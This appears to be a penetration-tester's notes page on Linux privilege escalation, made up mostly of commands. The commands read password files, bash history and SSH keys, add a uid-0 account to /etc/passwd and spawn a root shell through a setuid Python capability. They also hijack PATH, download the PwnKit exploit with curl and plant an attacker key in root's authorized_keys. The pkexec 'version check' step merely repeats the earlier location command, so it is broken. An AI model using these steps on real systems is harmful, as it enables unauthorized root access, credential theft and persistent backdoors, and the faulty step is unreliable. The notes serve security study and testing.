Enumeration

Manual Enumeration

ID

When gaining initial access to a target, one of the first things we should identify is the user context. We can use the id command to gather user context information

id

There are some groups that are vulnerable: Linux Groups Privilege Escalation

Users

Enumerate the users and try to access to them

ls /home
cat /etc/passwd

Bash History

For every user, check the bash history

cat .bash_history

Sudoers

sudo -l

We can use https://gtfobins.github.io/gtfobins

doas

If the system does not support sudo it will use doas, check the configuration ig it have the suid bit:

strings $(which doas) | grep doas.conf

SUID Privileges

We can use find to search for SUID-marked binaries.

find / -perm -u=s -type f 2>/dev/null

Once we find one go to https://gtfobins.github.io/.

Read binaries

strings <path_to_binary>

Abuse of incorrectly implemented permissions

We can use find to identify files with insecure permissions.

Searching directories writable by the user

find / -writable -type d 2>/dev/null

The following command will look for files (and not symlinks etc) that are writable.

find / -not -type l -perm -o+w

One-Liner to find directories and files

find / \( -path /proc -o -path /sys -o -path /dev \) -prune -o \
-perm -o+w \( -type f -o -type d \) -print 2>/dev/null | xargs -r ls -ld --color=always

Abusing Password Authentication

openssl passwd <PASSWORD>

# DES crypt
mkpasswd -m des <password> -s

echo "root2:<password>:0:0:root:/root:/bin/bash" >> /etc/passwd
su root2

Add users to /etc/sudoers

user ALL=(ALL:ALL) ALL

Files belonging the user

find / -user user -o group user 2>/dev/null

Processes

We can list system processes (including those run by privileged users) with the ps command.

ps aux

Enumerate local ports

Finally, we can display active network connections and listening ports using either netstat or ss, both of which accept the same arguments.

ss -anp
netstat -tnlp
netstat -na -p tcp

If we detect ports that we don't detected initially we should forward the port to our machine and check what is inside.

Cron Jobs

The Linux-based job scheduler is known as cron. Scheduled tasks are listed under the /etc/cron.* directories, where * represents the frequency at which the task will run.

ls -lah /etc/cron*
grep "CRON" /var/log/syslog

It is worth noting that system administrators often add their own scheduled tasks in the /etc/crontab file.

crontab -l
sudo crontab -l

Computer Information

To see the linux version and the kernel put the commands:

cat /etc/issue
cat /etc/os-release
uname -a
lsb_release -a

We can use the linux exploit suggester tool

Network

ip a
routel

Identifying Common Applications

To list applications installed by dpkg on our Debian system

dpkg -l

Listing filesystems

cat /etc/fstab
mount

View disks

findmnt
lsblk
fdisk -l

Mount a folder with the disk contents

mkdir -p /mnt/tmp
mount /dev/xvda1 /mnt/tmp

Detection and Explotation of Capabilities

/usr/sbin/getcap -r / 2>/dev/null

Potential Escalate Privileges capabilities

cap_dac_read

Allows us to read any file from the system

cap_setuid

Allow us to change the uid of the user

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip

With this capability in python 3.8 we can create a python file for changing our id and open a shell:

import os
os.setuid(0)  # Switch to root user
os.system('/bin/bash')  # Spawn a root shell

motd.legal-displayed

If you find this file, there is a exploit for privesc: https://www.exploit-db.com/exploits/14339

Path Hijacking

$PATH is an environment variable that tells the system where to look for executables when you run a command without specifying its full path.

echo $PATH

Example output:

/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

Each directory is separated by :. The system searches these directories from left to right when executing commands.

Look for external commands without absolute paths. For example using tar instead of /usr/bin/tar in a script.

Modifying $PATH

You can add new directories at the beginning of $PATH to prioritize them:

export PATH="/tmp:$PATH"

Now, if an executable called tarexists in /tmp, it will run before the system's default tar.

Pkexec

Check if pkexec exists

which pkexec && ls -l $(which pkexec)

Check the package version

which pkexec && ls -l $(which pkexec)

If the version was built before Jan 25, 2022, it’s likely vulnerable.

Exploit

curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit

SSH Keys

If we have read access over the .ssh directory for a specific user, we may read their private ssh keys found in /home/user/.ssh/id_rsa or /root/.ssh/id_rsa, and use it to log in to the server. If we can read the /root/.ssh/ directory and can read the id_rsa file, we can copy it to our machine and use the -i flag to log in with it:

chmod 600 id_rsa
ssh root@<IP> -i id_rsa

If we find ourselves with write access to a users/.ssh/ directory, we can place our public key in the user's ssh directory at /home/user/.ssh/authorized_keys.

ssh-keygen -f key

This will give us two files: key (which we will use with ssh -i) and key.pub, which we will copy to the remote machine. Let us copy key.pub, then on the remote machine, we will add it into /root/.ssh/authorized_keys:

echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys

Now, the remote server should allow us to log in as that user by using our private key:

ssh root@<IP> -i key

Automated Tools

http://pentestmonkey.net/tools/audit/unix-privesc-check
https://github.com/rebootuser/LinEnum
https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

PreviousLinux NextCredential Hunting

Last updated 2 months ago